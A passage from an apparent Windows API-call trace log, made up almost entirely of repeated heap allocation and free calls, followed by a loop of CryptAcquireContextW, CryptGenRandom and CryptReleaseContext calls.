hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0033.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0033.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb078 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac90 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0033.334] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0033.335] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.335] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.335] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.335] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.336] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.336] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.336] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.337] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.337] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.337] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.338] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.338] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.338] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.338] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.338] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.339] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.339] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.339] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.339] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.340] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.340] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.340] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.341] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.341] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.341] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.342] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.342] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.342] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.343] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.343] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.343] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.343] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.343] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.352] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.353] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.353] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.353] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.354] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.354] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.354] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.355] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.355] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.355] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.355] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.356] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.356] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.356] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.356] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.356] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.357] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.357] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.357] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.358] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.358] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.358] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.359] CryptGenRandom (in: 